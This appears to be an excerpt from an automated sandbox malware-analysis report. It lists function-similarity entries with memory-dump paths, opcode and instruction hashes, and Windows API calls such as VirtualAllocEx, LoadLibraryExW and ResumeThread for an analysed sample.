                        • API String ID: 1726664587-0
                        • Opcode ID: 8e4aaffa62c217c4e70331f0908e98b409940dfd0a4e9eda9688317b87a231c5
                        • Instruction ID: 71fc8c33cfe4cbd36df44d47609802cf6fcd487f595c65da526880358e55fb21
                        • Opcode Fuzzy Hash: 8e4aaffa62c217c4e70331f0908e98b409940dfd0a4e9eda9688317b87a231c5
                        • Instruction Fuzzy Hash: 612128B19003599FDF10DFAAC981BEEBBF5FF88310F108429E518A7241D7789910CBA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D5F46
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 5293946bc36cf8b4d00b4fed6dbc89a9dae0c279c94bdeddb28e540962424990
                        • Instruction ID: 7c38a3eef9a454fe4db8957cf1ab5995a5bf68cf7e590102d942e81377754ca8
                        • Opcode Fuzzy Hash: 5293946bc36cf8b4d00b4fed6dbc89a9dae0c279c94bdeddb28e540962424990
                        • Instruction Fuzzy Hash: EE1159728002499FDB10DFAAC944BEEBFF5EF88720F108819E519A7250C775A954CFA1
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ADB6D9,00000800,00000000,00000000), ref: 00ADB8CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: bddac2d3461c473bb09ae2a2614202a869626ac99da649b268c2481550204e90
                        • Instruction ID: 94b37a484a777214d5780ba982571c92106dab2b03456b4d6ff740bd2358c693
                        • Opcode Fuzzy Hash: bddac2d3461c473bb09ae2a2614202a869626ac99da649b268c2481550204e90
                        • Instruction Fuzzy Hash: 791103B6D00249DFDB10CF9AC544B9EFBF8EB88310F10842AE519A7300C3B5A944CFA4
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: ff5c830339cf8a2f95aa38470c705c0fa3db8a591a2519577e07223fd4dd97fb
                        • Instruction ID: 275feaad8f73c9ab7c78084c6e4e9d920f4d8088aca4b7d299ea5af0ecc8a1cf
                        • Opcode Fuzzy Hash: ff5c830339cf8a2f95aa38470c705c0fa3db8a591a2519577e07223fd4dd97fb
                        • Instruction Fuzzy Hash: 4E1179B18003098FDB10DFAAC5457EEBBF5AB88724F108419D519A7240C7756800CFA4
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ADB6D9,00000800,00000000,00000000), ref: 00ADB8CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 762e90f6054be989f6e88affe44b2e5fead97678619233e754ec69a262536640
                        • Instruction ID: a665570ed1a0aa1e0cc21b53d52c7e7b6afafe66dea0ed0877f84db4b6df711a
                        • Opcode Fuzzy Hash: 762e90f6054be989f6e88affe44b2e5fead97678619233e754ec69a262536640
                        • Instruction Fuzzy Hash: 2C1103B6C00209CFDB10CF9AD544ADEFBF8AB88310F14842AD519A7300C3B5A545CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071D5F46
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 2e4f3b369201bb926de6c22e566e3c539c4428a0ed1ab60f13215933674f1488
                        • Instruction ID: 6e7f6b4d149165e2700b8a84d637bd46efb70c71d482cbb271926627792c8910
                        • Opcode Fuzzy Hash: 2e4f3b369201bb926de6c22e566e3c539c4428a0ed1ab60f13215933674f1488
                        • Instruction Fuzzy Hash: 291156728002499FDB10DFAAC944BEEBBF5AF88320F108819E519A7250C775A910CFA0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: b755f69790e8bee6c7445b45f1dc6e380521732618e4b6fe5f59f4420d59d500
                        • Instruction ID: bff64df5805aca07273e211112f2f4ce4e05587192bf83fc1f42a3bb3bf40999
                        • Opcode Fuzzy Hash: b755f69790e8bee6c7445b45f1dc6e380521732618e4b6fe5f59f4420d59d500
                        • Instruction Fuzzy Hash: 73116AB1D003498FDB10DFAAC5457AEFBF5AF88724F208419D519A7240CB75A900CF94
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071DA305
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e38c146795fac07eeacbe6184d8545c21d93d3bd1e0609f709cf4c8052f2246a
                        • Instruction ID: 59909ec63a3121be9bf743f8aac67da8e165f44119935e60a191c4a7339d8de6
                        • Opcode Fuzzy Hash: e38c146795fac07eeacbe6184d8545c21d93d3bd1e0609f709cf4c8052f2246a
                        • Instruction Fuzzy Hash: 361110B5800749AFCB10CF8AC544BEEBBF8EB48324F10841AE518A7640C3B5A940CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 071DA305
                        Memory Dump Source
                        • Source File: 00000000.00000002.2210186915.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_71d0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: e5d0e2b9b992ecdc6a748785338af270f0b040ad76cdc2fe4ba9d9e3edcbc064
                        • Instruction ID: 61483c0bbe102db25013c0979a98c7bdb802d5556ca874605132cb5daeb79bec
                        • Opcode Fuzzy Hash: e5d0e2b9b992ecdc6a748785338af270f0b040ad76cdc2fe4ba9d9e3edcbc064
                        • Instruction Fuzzy Hash: A011F2B58043499FDB10DF9AC545BEEBBF8EB48324F108459E918B7240D3B5A944CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ADB65E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2200030839.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ad0000_SecuriteInfo.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: cf9464085b5312aed3fdb52030adcf28ed75c59748c894a40babdefa7b065b04
                        • Instruction ID: 745589117b14f51302b72d326eaede226d8b4de77429c0b9dff1b21599e7b40b
                        • Opcode Fuzzy Hash: cf9464085b5312aed3fdb52030adcf28ed75c59748c894a40babdefa7b065b04
                        • Instruction Fuzzy Hash: CC11FAB6800649CFCB10CF9AC544A9EFBF4AB88724F10856AD829A7710D3B9A545CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6691d7bb881b67e16f693009f99ba9585414da97207fa46f73a82a65a4c9b7f0
                        • Instruction ID: a1cbf55d3c4edca1eb123cff116e7d755afb2e532f5b5dbd940427c482e751c5
                        • Opcode Fuzzy Hash: 6691d7bb881b67e16f693009f99ba9585414da97207fa46f73a82a65a4c9b7f0
                        • Instruction Fuzzy Hash: 7762C4F0E05B438AD7F46FB495883AE7AE1AB45308F614B1ED0FACA741DB34544ACB15
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e13a72558231e7b2e9833df00b9bec3e0e44a49ee76c37c9a665dc24a7c691bb
                        • Instruction ID: 4dcf31adfe930ca06055cd7e78888e8fc34ca302985f6dbb5ffd56abab8999c5
                        • Opcode Fuzzy Hash: e13a72558231e7b2e9833df00b9bec3e0e44a49ee76c37c9a665dc24a7c691bb
                        • Instruction Fuzzy Hash: 1C224AF0905B438AD7F46BA4858439FBAD0AB06318F714B5BC0FACA355D734948BDB4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00db889e735cce5786e1d649a4e2c0a03a2c7583df3a36dbb0458bad451f1cd2
                        • Instruction ID: 75d1128f8c00bbc9386b2b7dd887d816182722f480fcdc5ec6fa5bc09c289e43
                        • Opcode Fuzzy Hash: 00db889e735cce5786e1d649a4e2c0a03a2c7583df3a36dbb0458bad451f1cd2
                        • Instruction Fuzzy Hash: EC915A31304704CFD745EB68D595AAE7BE7EBC9301F40856CE50A8B358DE34AD0ACB92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 489735e82a9779892f5dc6417aaed8fd45619cffb81a76c570bae3ea9a3bdb9e
                        • Instruction ID: 7dffafff5265f1466412be8dc15ffdd17b2dfe8d70f4314e84a6547e26a20756
                        • Opcode Fuzzy Hash: 489735e82a9779892f5dc6417aaed8fd45619cffb81a76c570bae3ea9a3bdb9e
                        • Instruction Fuzzy Hash: D2518035700204CFDB54EB78D855B6A7FE3EBC8711F208069E9069B399CE34AC06CB91
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 31ca249c212574d0dba6028f5690652cee6230e87afc9479682d6561c60e4c9e
                        • Instruction ID: d8d99d06f87b2d4808e40bde6859499754366924e3802f91ae9a91bd9b6767fe
                        • Opcode Fuzzy Hash: 31ca249c212574d0dba6028f5690652cee6230e87afc9479682d6561c60e4c9e
                        • Instruction Fuzzy Hash: EC51C371B002098FCB05EF7998448BEBBF6EFC53207548669E465D7351EF309D0187A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bccf8b82e9f77392f975c44f647b6c39282715c33c1d8d4fd08037b421f09065
                        • Instruction ID: 75c72e43c2ba0623953819003c966f29b414ac7c224358d8fdc42511ae8220e9
                        • Opcode Fuzzy Hash: bccf8b82e9f77392f975c44f647b6c39282715c33c1d8d4fd08037b421f09065
                        • Instruction Fuzzy Hash: 2B510FB4D7920ADFCB81DFA8D4849EDBBB4BB0E344F409556E4A6E7381D7349811CB14
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e900119c9a3169fe4b8a25bb5394b9a9a0ad8aea1206dd1e20f99e03d81ef1c1
                        • Instruction ID: 9eff35b14d2f217b538cd615ccffdfa1d551c26c0f79b7726139b6aec8de99b4
                        • Opcode Fuzzy Hash: e900119c9a3169fe4b8a25bb5394b9a9a0ad8aea1206dd1e20f99e03d81ef1c1
                        • Instruction Fuzzy Hash: 04510FB4D7920ADFCB80EF99D4848EDBBB8BB0E344F809556E8A6E7341D7349811CB14
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 52d19b4fda4b159b63a3af59f651240e3eed224a060607a1762043ea0cc55837
                        • Instruction ID: e6f760cb7faf74d0d36b1fbd66026421507cf100029a56c5827e2c421510b362
                        • Opcode Fuzzy Hash: 52d19b4fda4b159b63a3af59f651240e3eed224a060607a1762043ea0cc55837
                        • Instruction Fuzzy Hash: E241F6B4D29219CFCF91EFA9D484AFDBBF9BB0A310F146215E49AB7251D734A941CB00
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f90e5806dd1b5d81129b3dc55864367e7ba42c93cbf9b72aa55395670ecb6768
                        • Instruction ID: 2e85684728c190989252d9cf399e68f640761a21efa2e359f83393ada4ac8270
                        • Opcode Fuzzy Hash: f90e5806dd1b5d81129b3dc55864367e7ba42c93cbf9b72aa55395670ecb6768
                        • Instruction Fuzzy Hash: 0C412AB0E1821ACFDB48DFA9C4446EEBBF6BF8E300F14D26AD459A3252D7745941CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dc377c16d980dcbe7a2116188aa74afbeedb925efcf8df4448b0ff8aba3b3aec
                        • Instruction ID: 6bcfe6c905eb9dd0c6f6f1f4a3e96612dd6d92f30750043d271e7d8ab50e69f1
                        • Opcode Fuzzy Hash: dc377c16d980dcbe7a2116188aa74afbeedb925efcf8df4448b0ff8aba3b3aec
                        • Instruction Fuzzy Hash: D34170B4929615CFD784DF59D484ABDBFB9BF4F300F81D594D0A99B2A6CB309811CB00
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8e2282010ab323a4e77e8b9e2991b9388d74f332e32ce79373ea4a8ef137b089
                        • Instruction ID: 6d7641674e450140ca6f70e600d69792abcb07fa705b7fac307e43c4ed50f079
                        • Opcode Fuzzy Hash: 8e2282010ab323a4e77e8b9e2991b9388d74f332e32ce79373ea4a8ef137b089
                        • Instruction Fuzzy Hash: D2414EB4929619CFD784EF5AD484ABDBBF8BF4E300F81D595D0A99B296DB309810CB00
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44c5994d5867ee6189b15e1490a8a33bd0508509d1fb746f65f41b0d664345e4
                        • Instruction ID: b0ffdf64e904830d038c326c824155ac00bd0c4dc1c1408204c95c636d65b14d
                        • Opcode Fuzzy Hash: 44c5994d5867ee6189b15e1490a8a33bd0508509d1fb746f65f41b0d664345e4
                        • Instruction Fuzzy Hash: 93D017B6C15108EFC741DFA0D7433EEBBF2DB85201F1446EA994A9B710EA364A259782
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f9a78df5e702f7e015222dcd3588927ae2279651a8b4da1a69e95ee6a0b8520
                        • Instruction ID: b76e891457032906c606f2c5b6a495c4ce1fe12a3f95ae16bfa4d91e5f233b91
                        • Opcode Fuzzy Hash: 8f9a78df5e702f7e015222dcd3588927ae2279651a8b4da1a69e95ee6a0b8520
                        • Instruction Fuzzy Hash: 9BE01AB1610019CFCB84AFA8E4487E837F0BB48266F4001A8E015DB2A1DB349996CB14
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6b0a05385343f3d19b118277376c2e0931ceb59b1a5a18963c6caa521128372d
                        • Instruction ID: 7440ee4b2dbc3a768a831abeb61e44bb118ee90d7e8cf0d8658a6e6a2bc9572d
                        • Opcode Fuzzy Hash: 6b0a05385343f3d19b118277376c2e0931ceb59b1a5a18963c6caa521128372d
                        • Instruction Fuzzy Hash: C0E08C3220C2508FC302CF50E990A86BBA2AF86600F08848AE0809B252C2218C06CB73
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c4216b579e00b677ce207ab45e69a7f4bfbb64458fe8049996adb13aa4ddd5b
                        • Instruction ID: 98da26b60097827c547a18233d53d5643c96b8428c67e4cdb1b0dc96609f5e37
                        • Opcode Fuzzy Hash: 9c4216b579e00b677ce207ab45e69a7f4bfbb64458fe8049996adb13aa4ddd5b
                        • Instruction Fuzzy Hash: 1BE0EC7496E344CFCB41AFA4C0889BCBBBCAF0B300F016185D46A9B253C778A854CE14
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d655e20bc9420f2b4d28ce43aeaae9e48b2e15acba99d29f93e51db75cb0ff66
                        • Instruction ID: 2ac82c259bd6f9a8ede85eb065473c4f235a5c7f832fb55c1a0f38417785353f
                        • Opcode Fuzzy Hash: d655e20bc9420f2b4d28ce43aeaae9e48b2e15acba99d29f93e51db75cb0ff66
                        • Instruction Fuzzy Hash: 62D0A7351042105FD240DB14C952B53BBE9EBC5220F14C85EE45183300CB61DC078B61
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                        • Instruction ID: cabda2b4602100259c63b2ff83a5187cfd2048aabac7fca562ed6b9a593e87e1
                        • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                        • Instruction Fuzzy Hash: 5BD067B896E205CBCB84FB55C4889BDB76CFB0B300F01A64594BA6B202CA75B454CE44
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a77b96801bc0f0a88eb94de3b202536f861a1d033352c2f04a17e74fe191d2a9
                        • Instruction ID: 117ddd705bd535459f11c07d6a608f1ca45c9a52bb6e6276aff30c0ee24f9fac
                        • Opcode Fuzzy Hash: a77b96801bc0f0a88eb94de3b202536f861a1d033352c2f04a17e74fe191d2a9
                        • Instruction Fuzzy Hash: B4D0C96525E5C01FC30283349D72696BFA19E87204369C8D6D18CCB663D6269D27DB61
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9217fd7fb16e6718e3518f9a9fae348a3b12f45a84992d344b25adccf1f3d5f4
                        • Instruction ID: 86f6f9ada9ac4690658c34e89aace765973b6c6ac3d9d06de64c62f9808a98ea
                        • Opcode Fuzzy Hash: 9217fd7fb16e6718e3518f9a9fae348a3b12f45a84992d344b25adccf1f3d5f4
                        • Instruction Fuzzy Hash: 19D0C9B250D3515FC34B9A64DC53081BFA0DA4A12031880DBD446CF363E636E94BABA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 28bccea45d0ae86728accdd7cd9f5924e15c334af400c5676a0582fce81b38b0
                        • Instruction ID: 331729dae582111572511f427f26a0dd52cb1683f9a7c17b1e977d24693276cf
                        • Opcode Fuzzy Hash: 28bccea45d0ae86728accdd7cd9f5924e15c334af400c5676a0582fce81b38b0
                        • Instruction Fuzzy Hash: DDD0C9B190520CEF8B40EFA4994059EBBF9DB8A640B5046EA960597210EE715E1097D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f08407f83b9ed5097e2801a46afa82a014d65f808aabcca69dc2a150ca54f6e
                        • Instruction ID: 3e5b06d5bc6288559187e479096bb4efcf3420ffc292abbd725073a3fcbfa6e1
                        • Opcode Fuzzy Hash: 5f08407f83b9ed5097e2801a46afa82a014d65f808aabcca69dc2a150ca54f6e
                        • Instruction Fuzzy Hash: 79D052328006008FD300FA28DA82788B7A0EBA2208F18C16AD04A8B300EF29D44BA741
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a4532e9c96f1c8de98c0e6275ee87924a9153dcde0e46bb8f3bfe6fe24d562e0
                        • Instruction ID: c233e2613b0b06bee175cf9a4a45fd1b4ae5b85d9d0b4631107e91e6f4793522
                        • Opcode Fuzzy Hash: a4532e9c96f1c8de98c0e6275ee87924a9153dcde0e46bb8f3bfe6fe24d562e0
                        • Instruction Fuzzy Hash: 54D0A97190620CEF8B00EFA0D80149EBFFDEB49200B4005EAE906C7200EE316A009B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d11007c23fc98d544ffae50db52b627223c307689a30d44a6f6440606652b8f0
                        • Instruction ID: 60eab747ebe8dc8719f4655866a00cca5c07039fe0ecdf8dad328cdca4f1d028
                        • Opcode Fuzzy Hash: d11007c23fc98d544ffae50db52b627223c307689a30d44a6f6440606652b8f0
                        • Instruction Fuzzy Hash: 66D09E202092815FCB47C77898A0054BFB19F8B208319A0DAD498C7257D7219C139714
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ed81f9f57f4b4e070976eed00e779d7296e0c6984385fb2b0326f3dbea3c2435
                        • Instruction ID: a14692651f9c8ca45ce6c58f1b4b3373846ed4e0ce8c24bd315b52938b8cecbd
                        • Opcode Fuzzy Hash: ed81f9f57f4b4e070976eed00e779d7296e0c6984385fb2b0326f3dbea3c2435
                        • Instruction Fuzzy Hash: 84D0C97121D2C25EC7039B78A8A0894BF315E8721472C94D6D485CB15BCB255817D760
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04e10050bd1740918bdd87b7bb0618fa9a78f94868c247f2ac443650c415ffdb
                        • Instruction ID: 170ec640c0842d9dc1cbdb3f228a925979573cfe4a606936c7896975ca6c929f
                        • Opcode Fuzzy Hash: 04e10050bd1740918bdd87b7bb0618fa9a78f94868c247f2ac443650c415ffdb
                        • Instruction Fuzzy Hash: E2C08CB004064887D3842BE0B90E3243EA87B00202F841220D14D008A28BF894D4D666
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8cc3e887278cfade634f5e6264b96498b6115f12efaba03fe720c878443ba6db
                        • Instruction ID: 5bf3008d9492b0019c55d22a7b32368d900e5255ea230e391d2516683cf5b674
                        • Opcode Fuzzy Hash: 8cc3e887278cfade634f5e6264b96498b6115f12efaba03fe720c878443ba6db
                        • Instruction Fuzzy Hash: ADC012A090D3806FC701C674EC524027B514B85100729C0DA9854CB393D519DC0B8352
                        Memory Dump Source
                        • Source File: 00000000.00000002.2209487640.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_7080000_SecuriteInfo.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 857cdf7025eb7b94d42ddc9079f070c857bcb6d1d759e6333aa029f95a7729d9
                        • Instruction ID: ebdd77f7fefce384cd6331b7834f24627ee1fbec58dfb336ed422dafba310d01
                        • Opcode Fuzzy Hash: 857cdf7025eb7b94d42ddc9079f070c857bcb6d1d759e6333aa029f95a7729d9
                        • Instruction Fuzzy Hash: 74C012650093C0AECB433B609C10C457FB0AE43304319C0D2E2808A073D1114434D712
                        Memory Dump Source
